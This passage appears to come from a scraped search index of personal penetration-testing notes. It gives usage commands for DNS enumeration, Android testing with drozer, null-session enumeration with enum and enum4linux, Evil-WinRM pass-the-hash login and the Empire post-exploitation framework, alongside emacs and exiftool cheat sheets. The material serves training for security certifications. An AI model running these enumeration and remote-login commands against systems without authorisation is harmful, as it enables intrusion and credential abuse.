    One cool thing about dnsenum is that it can perform dns transfer zone, like [dig]](dig.md).

    It performs DNS brute force with /usr/share/dnsenum/dns.txt.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnspy/","title":"DNSpy - A .NET decompiler for windows","text":"

    Download it from: https://github.com/dnSpy/dnSpy/releases

    You can use dnsSpy to determine if application is .NET executables or native code. If DNSpy decompiles the file .exe, then it means that\u2019s .NET executable.

    Finding a .NET decompiler for Linux

    There are well-known decompilers out there. For windows you have dnSpy and many more. In linux you have the open source ILSpy. BUT: Installation required some dependencies. There were more tools (wine).

    ","tags":["pentesting"]},{"location":"dnsrecon/","title":"DNSRecon","text":"

    Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target.

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsrecon/#basic-usage","title":"Basic usage","text":"
    dnsrecon -d example.com\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"docker/","title":"docker","text":"","tags":["docker"]},{"location":"docker/#installation","title":"Installation","text":"

    To make sure that I have docker engine, docker compose and nginx installed.

    sudo apt install docker docker-compose nginx\n

    Depending on the image you are going to compose you will need nginx or other dependencies.

    ","tags":["docker"]},{"location":"docker/#basic-commands","title":"Basic commands","text":"
    # show all processes \ndocker ps -a\n\n# Actions on dockerInstance/PID/part of id if unique: restart, stop, start, status\nsudo docker <restart/stop/start/status> <nameOfDockerInstance/PID/partOfIDifUnique>\n\n# Create the first docker instance: Hello, world! It gets the setting from docker.hub\nsudo docker run hello-world\n# run: build and deploy an instance\n# by default, docker saves everything in /var/lib/docker\n\n# Execute commands in an already running docker instance. You can execute a terminal or a command. \nsudo docker run -it <image> <echo lala / bf bash>\n# image: for instance, debian\n# <echo lala or bf bash>: command echo lala. Or terminal in bash\n
    ","tags":["docker"]},{"location":"dotpeek/","title":"dotPeek - A tool for decompiling","text":"

    dotPeek is a tool by JetBrains.

    "},{"location":"dotpeek/#installation","title":"Installation","text":"

    Download from: https://www.jetbrains.com/es-es/decompiler/download/#section=web-installer

    "},{"location":"dread/","title":"Microsoft DREAD","text":"

    Microsoft DREAD. DREAD is a risk assessment system developed by Microsoft to help IT security professionals evaluate the severity of security threats and vulnerabilities. It is used to perform a risk analysis by using a scale of 10 points to assess the severity of security threats and vulnerabilities. With this, we calculate the risk of a threat or vulnerability based on five main factors:

    • Damage Potential
    • Reproducibility
    • Exploitability
    • Affected Users
    • Discoverability
    ","tags":["dread","cvss"]},{"location":"drozer/","title":"drozer - A security testing framework for Android","text":"

    drozer (formerly Mercury) is the leading security testing framework for Android.

    drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering.

    ","tags":["mobile pentesting"]},{"location":"drozer/#installation","title":"Installation","text":"

    Instructions from: https://github.com/WithSecureLabs/drozer

    Also, you can download it from: https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

    adb install drozer-agent-2.3.4.apk\npip install twisted\n

    Prerequisites: JDK 1.6, python2.7, Android SDK, adb, java 1.6.

    Note: Java 1.6 is mandatory since Android bytecode is only compliant to version 1.6 and no higher.

    1. Install genymotion and get a device, for instance a samsung galaxy S6, running in the virtualbox.
    2. Go to drozer app ant turn on servers. You will get a message on the app saying that port 31415 is now on.
    3. From the terminal, we redirect the port with:
      adb connect IPDevice:PORT\nadb forward tcp:31415 tcp:31415\n
    4. No we connect to drozer console:
      drozer console connect\n

    For this to work, we need to have:

    • device set on Host-Only + Nat mode.
    • Kali set on Host-Only + Nat mode.

    Also, connections need to be running on the same interfaces (ethn).

    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands","title":"Basic commands","text":"

    These commands run on a drozer terminal:

    # Display the apps installed on the device.\nrun app.package.list\n\n# Display only the apps with identifier lala\nrun app.package.list -f lala\n\n# Log debug information\nlog.d\n\n# Log system information\nlog.i\n\n# Log error information\nlog.e\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-packages","title":"Basic commands on packages","text":"
    # Display available commands.\nrun + TAB\n\n# Show the manifest of a given app.\nrun app.package.manifest nameOfApp\n\n# Show generic information about the app\nrun app.package.info -a nameOfApp\n\n# Display surface, a resume of activities, component providers, services, exported activities and if it is debugable.\nrun app.package.attacksurface nameOfApp\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-activities","title":"Basic commands on activities","text":"
    # Show generic information about the activities\nrun app.activity.info -a nameOfApp\n\n# Display an activity on a device\nrun app.activity.start --component nameOfApp nameOfApp.nameOfActivity\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-providers","title":"Basic commands on providers","text":"
    # Display existing providers.\nrun app.provider.info -a nameOfApp\n\n# Display the location of providers. It uses content:// protocol\nrun app.providers.finduri nameOfApp\n\n# Display the database information of the provider.\nrun app.provider.query uriOfProvider\n
    ","tags":["mobile pentesting"]},{"location":"drozer/#basic-commands-on-scanners","title":"Basic commands on scanners","text":"
    # To see all tests and scans you can run with drozer on your app.\nrun scanner. +TAB\n\n# Test the app to see if it is vulnerable to an injection.\nrun scanner.provider.injection -a nameOfApp\n\n# Check out if the App is vulnerable to a traversal attack\nrun scanner.provider.traversal -a nameOfApp\n
    ","tags":["mobile pentesting"]},{"location":"echo-mirage/","title":"Echo Mirage","text":"","tags":["windows","thick applications","traffic tool"]},{"location":"echo-mirage/#installation","title":"Installation","text":"

    Download from

    Google Drive:

    https://drive.google.com/open?id=1JE70HH-CNd_VIl190sheL72w3P5dYK58

    Mega.nz:

    https://mega.nz/#!lRtUzApC!2hBLDnNiOZJ87Z9kmgFfwDLDvWZUBixGpZrTVtuYHSI

    ","tags":["windows","thick applications","traffic tool"]},{"location":"ejpt/","title":"eJPT - eLearnSecurity Junior Penetration Tester Cheat Sheet","text":"

    What is eJPT? The eJPT is\u00a0a 100% hands-on certification for penetration testing and essential information security skills.

    I'm more than happy to share my personal cheat sheet of the #eJPT Preparation exam.

    ","tags":["pentesting"]},{"location":"ejpt/#subdomain-enumeration","title":"Subdomain enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. amass In depth DNS Enumeration and network mapping.","tags":["pentesting"]},{"location":"ejpt/#footprinting-scanning","title":"Footprinting & Scanning","text":"Tool + Cheat sheet What it does ping ping works by sending one or more special ICMP packets (Type 8 - echo request) to a host. If the destination host replies with ICMP echo reply packets, then the host is alive. fping Linux tool which is an improved version of the ping utility. nmap Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. p0f P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. masscan Masscan was designed to deal with large networks and to scan thousands of Ip addresses at once. It\u2019s faster than nmap but probably less accurate.","tags":["pentesting"]},{"location":"ejpt/#enumeration-tools","title":"Enumeration tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["pentesting"]},{"location":"ejpt/#dictionaries","title":"Dictionaries","text":"

    List of dictionaries.

    Tool + Cheat sheet What it does crunch Generate combinations of words and manglings to be used later off as attacking dictionaries.","tags":["pentesting"]},{"location":"ejpt/#vulnerability-assessment-scanners","title":"Vulnerability assessment: scanners","text":"Available scanners + Cheat sheet URL Nessus https://www.tenable.com/downloads/nessus OpenVAS https://www.openvas.org/ Nexpose https://www.rapid7.com/products/nexpose/ GFOLAnGuard https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard","tags":["pentesting"]},{"location":"ejpt/#toolstecniques-for-network-exploitation","title":"Tools/tecniques for network exploitation","text":"Tool + Cheat sheet What it does netcat netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. openSSL OpenSSL is a software library for applications that provide secure communications over computer networks against eavesdropping or need to identify the party at the other end. It is widely used by Internet servers, including the majority of HTTPS websites. Registry creation Registries in the victim machine may be used to save a connection to the attacker machine.","tags":["pentesting"]},{"location":"ejpt/#web-pentesting","title":"Web pentesting","text":"Vulnerability / Technique What it does Tool Backdoors with netcat Buffer Overflow attacks A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer\u2019s limits, an attacker could find a way to write data beyond those limits. Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. XSS attack - Cross-site Scripting attack Cross-Site Scripting attacks or XSS attacks enable attackers to inject client-side scripts into web pages. This is done through an URL than the attacker sends. Crafted in the URL, this js payload is injected. xsser SQL injection SQL stands for Structure Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. sqlmap","tags":["pentesting"]},{"location":"ejpt/#password-cracker","title":"Password cracker","text":"Tool + Cheat sheet What it does ophcrack Ophcrack is a free Windows password cracker based on rainbow tables. It is a efficient implementation of rainbow tables. It comes with a Graphical User Interface and runs on multiple platforms. hashcat Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. wikipedia. John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#dictionary-attacks","title":"Dictionary attacks","text":"Tool + Cheat sheet What it does John the Ripper John the Ripper is one of those tools that can be used for several things: hash cracker and dictionary attack. hydra Hydra can attack nearly 50 services including: Cisco auth, FTP, HTTP, IMAP, RDP, SMB, SSH, Telnet... It uses modules for each protocol.","tags":["pentesting"]},{"location":"ejpt/#windows","title":"Windows","text":"

    Introduction about NetBIOS.

    Vulnerability / Technique What it does Tools Null session attack This attack exploits an authentification vulnerability for Windows Administrative Shares. Manual attack, Winfo, enum, enum4linux, samrdump.py, nmap script Arp poisoning This attack is performed by sending gratuitous ARP replies. arpspoof Remote Code Execution RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system. Burpsuite and Wireshark","tags":["pentesting"]},{"location":"ejpt/#linux","title":"Linux","text":"

    Spawn a shell. msfvenom.

    ","tags":["pentesting"]},{"location":"ejpt/#lateral-movements","title":"Lateral movements","text":"

    Lateral movements

    ","tags":["pentesting"]},{"location":"emacs/","title":"emacs - A text editor... and more","text":""},{"location":"emacs/#syntax","title":"Syntax","text":"

    Before starting, it is convenient to consider the syntax we'll be using:

    C-<char> \nWe'll keep press CTRL key and at the same time a character.\n\nM-<char>\nWe'll keep press ALT key and at the same time a character.\n\nESC <char>\nWe'll press ESC key, and after that we'll press the character.\n\nC <char>\nWe'll press CTRL key, and after that we'll press the character.\n\nM <char>\nWe'll press ALT key, and after that we'll press the character.\n
    "},{"location":"emacs/#basic-commands","title":"Basic commands","text":"

    Disclaimer: when creating this cheat sheet, I've realized that I'm totally in love with emacs, meaning this article is full of bias comments. Neutrality is overrated.

    "},{"location":"emacs/#session-and-process-management","title":"Session and process management","text":"
     # Close session. It will ask if you want to save the buffers.\nC-x C-c\n\n# Cancel a running process.\nC-g\n\n# Remove all open windows and expand the windows that contains the active cursor position \nC-x 1\n
    "},{"location":"emacs/#cursor-movement","title":"Cursor Movement","text":"

    A difference with vim or neovim editor, \"cursor mode\" and \"insert mode\" go together in emacs, meaning you will be able to insert any character from whenever the cursor is without having to switch from one mode to another.

    There is also a small but big difference. Emacs includes a blank character at the end of the line. This alone can sound very vague, but it allows you to move in a more natural and human way from the beginning of one line to the end of the previous one. Just this silly feature makes me love more emacs than vim (#sorryVimDudes).

    # Go to previous line.\nC-p\n\n# Go to next line.\nC-n\n\n# Move cursor position one character forwards.\nC-f\n\n# Move cursos position one character backwards.\nC-b\n\n# Go to the beginning of the line.\nC-a\n\n# Go to the end of the line.\nC-e\n\n# Go to the beginning of the sentence.\nM-a\n\n# Go to the end of the sentence.\nM-e\n\n# Go to the beginning of the file.\nM-<\n\n# Go to the end of the file.\nM->\n
    "},{"location":"emacs/#deleting","title":"Deleting","text":"
    # Remove following word\nM-d\n\n# Remove previous word\nM-DEL\n\n# Remove from the cursor position to the end of the line\nC-k\n\n# Remove from the cursor position to the end of the sentence\nM-k\n\n# Select from here to the position where you've moved the cursor. \nC-Space\nDEL\n
    "},{"location":"emacs/#clipboard","title":"Clipboard","text":"

    Another cool functionality in emacs is that clipboard has history. If having a blank character at the end of the line wasn't not enough for just falling in love with emacs, now you cannot make excuses. The ability to navigate through the history of yanked code turns emacs into exactly what you have dreaming with.

    # Browse the clipboard to older yanked text. \nM-y\n
    "},{"location":"emacs/#undo","title":"Undo","text":"
    # Three ways to undo an action text related (non cursor position related).\nC-/\nC-_\nC-x u\n
    "},{"location":"emacs/#buffers","title":"Buffers","text":"

    Also, browsing your buffers in emacs is insanely easy. One more reason to love emacs.

    The emacs autosaved file has this syntax:

    #nameOfAutosavedFile;\n
    # List your buffers.\nC-b\n\n# Get rid of the list with all buffers.\nC-x 1\n\n# Go to an specific buffer (normally all of them are wrapped up between * *).\nC-x b <nameOfBuffer>\n\n# Enter in a minibuffer\nM-x\n\n# Get out of a minibuffer (in this case C-g doesn't work).\nESC ESC ESC\n
    "},{"location":"emacs/#file-management","title":"File management","text":"
    # Save in bulk. It will ask if you want to save your buffers one by one.\nC-x s\n\n# To recover a file:\n# Open the non saved file with\nemacs nameOfNonSavedFile\u00e7\nM-x recover-file RETURN\nYes ENTER\n
    "},{"location":"emacs/#modes","title":"Modes","text":"
    # Change to fundamental mode.\nM-x fundamental-mode\n\n# Change to text mode.\nM-x text-mode\n\n# Activate or deactivate autofill mode.\nM-x auto-fill-mode RETURN\n
    "},{"location":"emacs/#search","title":"Search","text":"
    # Search for an expression forwards.\nC-s\n\n# Search for an expression backwards.\nC-r\n
    "},{"location":"emacs/#windows-management","title":"Windows management","text":"

    Only a few things can compete with the beauty of i3 windows manager, and in my opinion emacs is not as neat and direct as i3, but still, emacs is not exactly a windows management tool but it manages its windows in a quite easy way:

    # Divide vertically current window in two.\nC-x 2\n\n# Divide horizontally current window in two.\nC-x 3\n\n# Move cursor position to the other window.\nC-x o\n\n# Open a file in a different window below.\nC-x 4 C-f nameOfFile\n\n# Create a new and independent window.\nM-x make-frame\n\n# Remove/close the window.\nM-x delete-frame\n
    "},{"location":"emacs/#help","title":"Help","text":"
    # Show documentation about a command.\nC-h k command\n\n# Describe a command.\nC-h x command\n\n# Open available manuals.\nC-h i\n
    "},{"location":"empire/","title":"Empire","text":"

    Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.

    Basically, you can run powershell agents without having to run powershell.

    ","tags":["post exploitation"]},{"location":"empire/#installation","title":"Installation","text":"
    git clone https://github.com/EmpireProject/Empire.git\nEmpire/setup/install.sh\n
    ","tags":["post exploitation"]},{"location":"empire/#usage","title":"Usage","text":"","tags":["post exploitation"]},{"location":"enum/","title":"enum","text":"

    Enum is a console-based Win32 information enumeration utility. Using null sessions, enum can retrieve userlists, machine lists, sharelists, namelists, group and member lists, password and LSA policy information. enum is also capable of a rudimentary brute force dictionary attack on individual accounts.\u00a0

    ","tags":["windows","enumeration"]},{"location":"enum/#installation","title":"Installation","text":"

    Download it from: https://packetstormsecurity.com/search/?q=win32+enum&s=files.

    ","tags":["windows","enumeration"]},{"location":"enum/#basic-commands","title":"Basic commands","text":"
    # Enumerates shares\nenum.exe -s $ip \u00a0 \u00a0 \n\n# Enumerates users\nenum.exe -u $ip\n\n# Displays the password policy in case you need to mount a network authentification attack\nenum.exe -p $ip \n
    ","tags":["windows","enumeration"]},{"location":"enum4linux/","title":"enum4linux","text":"

    enum4linux is used to exploit null session attacks by using this PERL script. The\u00a0original tool\u00a0was written in Perl and\u00a0rewritten by Mark Lowe in Python. Essentially it does something similar to winfo and enum.

    ","tags":["windows","enumeration"]},{"location":"enum4linux/#installation","title":"Installation","text":"

    Preinstalled in kali.

    ","tags":["windows","enumeration"]},{"location":"enum4linux/#basic-commands","title":"Basic commands","text":"
    # Enumerate shares\nenum4linux.exe -S $ip\n\n# Enumerate users\nenum4linux.exe -U $ip \u00a0 \u00a0 \n\n# Enumerate machine list\nenum4linux.exe -M $ip\n\n# Display the password policy in case you need to mount a network authentification attack\nenum4linux.exe -enuP $ip\n\n# Specify username to use (default \u201c\u201d)\nenum4linux.exe -u $ip\n\n# Specify password to use (default \u201c\u201d)\nenum4linux.exe -p $ip \u00a0 \u00a0 \n\n# Also you can use brute force by adding a file\nenum4linux.exe -s /usr/share/enum4linux/share-list.txt $ip \u00a0\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux.exe -n $ip \u00a0\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerates the password policy in the remote system. This is useful to use brute force\nenum4linux.exe -P $ip\n\n# Enumerates available shares\nenum4linux.exe -s $ip     \n

    If you want to run all these commands in one line:

    enum4linux.exe -a $ip\n
    ","tags":["windows","enumeration"]},{"location":"evil-winrm/","title":"Evil-WinRm","text":"

    Evil-WinRM connects to a target using the Windows Remote Management service combined with the PowerShell Remoting Protocol to establish a PowerShell session with the target.

    By default, installed on kali. See winrm.

    ","tags":["tools","active directory","windows remote management"]},{"location":"evil-winrm/#basic-usage","title":"Basic usage","text":"

    Example from HTB machine: Responder.

    evil-winrm -i $ip -u <username -p <password>\n\nevil-winrm -i <ip> -u Administrator -H \"<passwordhash>\"\n# -H: Hash\n
    ","tags":["tools","active directory","windows remote management"]},{"location":"ewpt-preparation/","title":"eWPT Preparation","text":"Module Course (name and link) My notes on HackingLife 01 Introduction to Web application testing -HTTP and HTTPs- Phases of a web application security testing 02 Web Enumeration & Information Gathering Information gathering 03 WAPT: Web proxies and Web Information Gathering - BurpSuite- OWASP Zap 04 XSS Attacks - Cross Site Script vulnerabilities.- XSSer 05 SQL Injection Attacks - SQL injection: mysql, mssql, postgreSQL, mariadb, oracle database - NoSQL injection: sqlite, mongodb, redis - SQLi Cheat sheet for manual injection - Burpsuite Labs 06 Testing for common attacks - Testing HTTP Methods- Attacking basic and digest authentication, and OTP- Session management- Session fixation- Session highjacking- CSRF- Command injections- RCE attack - Remote Code Execution 07 File and Resource attacks - Arbitrary File Upload- Directory Traversal attack- Local File Inclusion (LFI)- Remote File Inclusion (RFI) 08 Web Service Security testing - Web services 09 CMS Security testing - Pentesting wordpress 10 Encoding, Filtering & Evasion - Data encoding- Input filtering

    eWPTX

    Module Course name My notes on HackingLife 01 Encoding and filtering - Data encoding- Input filtering 02 Evasion Basics 03 Cross-Site Scripting - Cross Site Script vulnerabilities. 04 Filter evasion and WAF Bypasssing 05 Cross-Site Request Forgery 06 HTML 5 07 SQL Injection 08 SQLi - Filter Evasion and WAF Bypassing 09 XML Attacks 10 Attacking Serialization 11 Server Side Attacks 12 Attacking Crypto 13 Attacking Authentication & SSO 14 Pentesting APIs & Cloud Applications 15 Attacking LDAP-based Implementations","tags":["course","certification","web pentesting"]},{"location":"exiftool/","title":"exiftool - A tool for metadata edition","text":"

    ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, Lyrics3, as well as the maker notes of many digital cameras by Canon, Casio, DJI, FLIR, FujiFilm, GE, GoPro, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Motorola, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

    ExifTool can\u00a0Read,\u00a0Write and/or\u00a0Create files in the following formats. Also listed are the support levels for EXIF, IPTC (IIM), XMP, ICC_Profile, C2PA (JUMBF) and other metadata types for each file format. C2PA metadata is not currently\u00a0Writable, but may be\u00a0Deleted from some file types by deleting the JUMBF group (ie.\u00a0-JUMBF:all=).

    ","tags":["pentesting","file"]},{"location":"exiftool/#installation","title":"Installation","text":"

    Download from https://exiftool.org/index.html.

    ","tags":["pentesting","file"]},{"location":"exiftool/#basic-usage","title":"Basic usage","text":"
    # Print common meta information for all images in \"dir\".  \"-common\" is a shortcut tag representing common EXIF meta information.\nexiftool -common dir\n\n# List specified meta information in tab-delimited column form for all images in \"dir\" to an output text file named \"out.txt\".\nexiftool -T -createdate -aperture -shutterspeed -iso dir > out.txt\n\n# Print ImageSize and ExposureTime tag names and values.\nexiftool -s -ImageSize -ExposureTime b.jpg\n\n\n# Print standard Canon information from two image files.\nexiftool -l -canon c.jpg d.jpg\n\n# Recursively extract common meta information from files in \"pictures\" directory, writing text output to \".txt\" files with the same names.\nexiftool -r -w .txt -common pictures\n\n# Save thumbnail image from \"image.jpg\" to a file called \"thumbnail.jpg\".\nexiftool -b -ThumbnailImage image.jpg > thumbnail.jpg\n\n# Recursively extract JPG image from all Nikon NEF files in the current directory, adding \"_JFR.JPG\" for the name of the output JPG files.\nexiftool -b -JpgFromRaw -w _JFR.JPG -ext NEF -r .\n\n# Extract all types of preview images (ThumbnailImage, PreviewImage, JpgFromRaw, etc.) from files in directory \"dir\", adding the tag name to the output preview image file names.\nexiftool -a -b -W %d%f_%t%-c.%s -preview:all dir\n\n# Print formatted date/time for all JPG files in the current directory.\nexiftool -d '%r %a, %B %e, %Y' -DateTimeOriginal -S -s -ext jpg \n\n# Extract image resolution from EXIF IFD1 information (thumbnail image IFD)\nexiftool -IFD1:XResolution -IFD1:YResolution image.jpg\n\n# Extract all tags with names containing the word \"Resolution\" from an image.\nexiftool '-*resolution*' image.jpg\n\n# Extract all author-related XMP information from an image.\nexiftool -xmp:author:all -a image.jpg\n\n# Extract complete XMP data record intact from \"a.jpg\" and write it to \"out.xmp\" using the special \"XMP\" tag (see the Extra tags in Image::ExifTool::TagNames).\nexiftool -xmp -b a.jpg > out.xmp\n
    ","tags":["pentesting","file"]},{"location":"exiftool/#tag-names","title":"Tag names","text":"

    See table with all tag names: https://exiftool.org/TagNames/.

    A\u00a0Tag Name\u00a0is the handle by which the information is accessed in ExifTool. Tag names are entered on the command line with a leading '-', in the order you want them displayed. Valid characters in a tag name are A-Z (case is not significant), 0-9, hyphen (-) and underline (_). The tag name may be prefixed by a\u00a0group name\u00a0(separated by a colon) to identify a specific information type or location. A special tag name of \"All\" may be used to represent all tags, or all tags in a specified group. For example:

    ","tags":["pentesting","file"]},{"location":"exiftool/#tag-groups","title":"Tag groups","text":"

    See all info related to Tag groups

    ExifTool classifies tags into groups in various families. Here is a list of the group names in each family:

    Family Group Names 0 (Information\u00a0Type) AAC, AFCP, AIFF, APE, APP0, APP1, APP11, APP12, APP13, APP14, APP15, APP2, APP3, APP4, APP5, APP6, APP7, APP8, APP9, ASF, Audible, Canon, CanonVRD, Composite, DICOM, DNG, DV, DjVu, Ducky, EXE, EXIF, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, GIF, GIMP, GeoTiff, GoPro, H264, HTML, ICC_Profile, ID3, IPTC, ISO, ITC, JFIF, JPEG, JSON, JUMBF, Jpeg2000, LNK, Leaf, Lytro, M2TS, MIE, MIFF, MISB, MNG, MOI, MPC, MPEG, MPF, MXF, MakerNotes, Matroska, Meta, Ogg, OpenEXR, Opus, PDF, PICT, PLIST, PNG, PSP, Palm, PanasonicRaw, Parrot, PhotoCD, PhotoMechanic, Photoshop, PostScript, PrintIM, QuickTime, RAF, RIFF, RSRC, RTF, Radiance, Rawzor, Real, Red, SVG, SigmaRaw, Sony, Stim, Theora, Torrent, Trailer, VCard, Vorbis, WTV, XML, XMP, ZIP 1\u00a0(Specific\u00a0Location) AAC, AC3, AFCP, AIFF, APE, ASF, AVI1, Adobe, AdobeCM, AdobeDNG, Apple, Audible, CBOR, CIFF, CameraIFD, Canon, CanonCustom, CanonDR4, CanonRaw, CanonVRD, Casio, Chapter#, Composite, DICOM, DJI, DNG, DV, DjVu, DjVu-Meta, Ducky, EPPIM, EXE, EXIF, ExifIFD, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, FujiFilm, FujiIFD, GE, GIF, GIMP, GPS, GSpherical, Garmin, GeoTiff, GlobParamIFD, GoPro, GraphConv, H264, HP, HTC, HTML, HTML-dc, HTML-ncc, HTML-office, HTML-prod, HTML-vw96, HTTP-equiv, ICC-chrm, ICC-clrt, ICC-header, ICC-meas, ICC-meta, ICC-view, ICC_Profile, ICC_Profile#, ID3, ID3v1, ID3v1_Enh, ID3v2_2, ID3v2_3, ID3v2_4, IFD0, IFD1, IPTC, IPTC#, ISO, ITC, InfiRay, Insta360, InteropIFD, ItemList, JFIF, JFXX, JPEG, JPEG-HDR, JPS, JSON, JUMBF, JVC, Jpeg2000, KDC_IFD, Keys, Kodak, KodakBordersIFD, KodakEffectsIFD, KodakIFD, KyoceraRaw, LNK, Leaf, LeafSubIFD, Leica, Lyrics3, Lytro, M-RAW, M2TS, MAC, MIE-Audio, MIE-Camera, MIE-Canon, MIE-Doc, MIE-Extender, MIE-Flash, MIE-GPS, MIE-Geo, MIE-Image, MIE-Lens, MIE-Main, MIE-MakerNotes, MIE-Meta, MIE-Orient, MIE-Preview, MIE-Thumbnail, MIE-UTM, MIE-Unknown, MIE-Video, MIFF, MISB, MNG, MOBI, MOI, MPC, MPEG, MPF0, MPImage, MS-DOC, MXF, MacOS, MakerNotes, MakerUnknown, Matroska, MediaJukebox, Meta, MetaIFD, Microsoft, Minolta, MinoltaRaw, Motorola, NITF, Nikon, NikonCapture, NikonCustom, NikonScan, NikonSettings, NineEdits, Nintendo, Ocad, Ogg, Olympus, OpenEXR, Opus, PDF, PICT, PNG, PNG-cICP, PNG-pHYs, PSP, Palm, Panasonic, PanasonicRaw, Parrot, Pentax, PhaseOne, PhotoCD, PhotoMechanic, Photoshop, PictureInfo, PostScript, PreviewIFD, PrintIM, ProfileIFD, Qualcomm, QuickTime, RAF, RAF2, RIFF, RMETA, RSRC, RTF, Radiance, Rawzor, Real, Real-CONT, Real-MDPR, Real-PROP, Real-RA3, Real-RA4, Real-RA5, Real-RJMD, Reconyx, Red, Ricoh, SPIFF, SR2, SR2DataIFD, SR2SubIFD, SRF#, SVG, Samsung, Sanyo, Scalado, Sigma, SigmaRaw, Sony, SonyIDC, Stim, SubIFD, System, Theora, Torrent, Track#, UserData, VCalendar, VCard, VNote, Version0, Vorbis, WTV, XML, XMP, XMP-DICOM, XMP-Device, XMP-GAudio, XMP-GCamera, XMP-GCreations, XMP-GDepth, XMP-GFocus, XMP-GImage, XMP-GPano, XMP-GSpherical, XMP-LImage, XMP-MP, XMP-MP1, XMP-PixelLive, XMP-aas, XMP-acdsee, XMP-album, XMP-apple-fi, XMP-ast, XMP-aux, XMP-cc, XMP-cell, XMP-crd, XMP-creatorAtom, XMP-crs, XMP-dc, XMP-dex, XMP-digiKam, XMP-drone-dji, XMP-dwc, XMP-et, XMP-exif, XMP-exifEX, XMP-expressionmedia, XMP-extensis, XMP-fpv, XMP-getty, XMP-hdr, XMP-hdrgm, XMP-ics, XMP-iptcCore, XMP-iptcExt, XMP-lr, XMP-mediapro, XMP-microsoft, XMP-mwg-coll, XMP-mwg-kw, XMP-mwg-rs, XMP-nine, XMP-panorama, XMP-pdf, XMP-pdfx, XMP-photomech, XMP-photoshop, XMP-plus, XMP-pmi, XMP-prism, XMP-prl, XMP-prm, XMP-pur, XMP-rdf, XMP-sdc, XMP-swf, XMP-tiff, XMP-x, XMP-xmp, XMP-xmpBJ, XMP-xmpDM, XMP-xmpDSA, XMP-xmpMM, XMP-xmpNote, XMP-xmpPLUS, XMP-xmpRights, XMP-xmpTPg, ZIP, iTunes 2\u00a0(Category) Audio, Author, Camera, Device, Document, ExifTool, Image, Location, Other, Preview, Printing, Time, Unknown, Video 3\u00a0(Document\u00a0Number) Doc#, Main 4\u00a0(Instance\u00a0Number) Copy# 5\u00a0(Metadata\u00a0Path) eg. JPEG-APP1-IFD0-ExifIFD 6\u00a0(EXIF/TIFF\u00a0Format) int8u, string, int16u, int32u, rational64u, int8s, undef, int16s, int32s, rational64s, float, double, ifd, unicode, complex, int64u, int64s, ifd64 7\u00a0(Tag\u00a0ID) ID-xxx (where xxx is the tag ID. Numerical ID's are given in hex with a leading \"0x\" if the\u00a0HexTagIDs API option\u00a0is set, as are characters in non-numerical ID's which are not valid in a group name. Note that unlike other group names, family 7 group names are case sensitive.) 8\u00a0(File\u00a0Number) File# (for files loaded via\u00a0-file_NUM_\u00a0option)

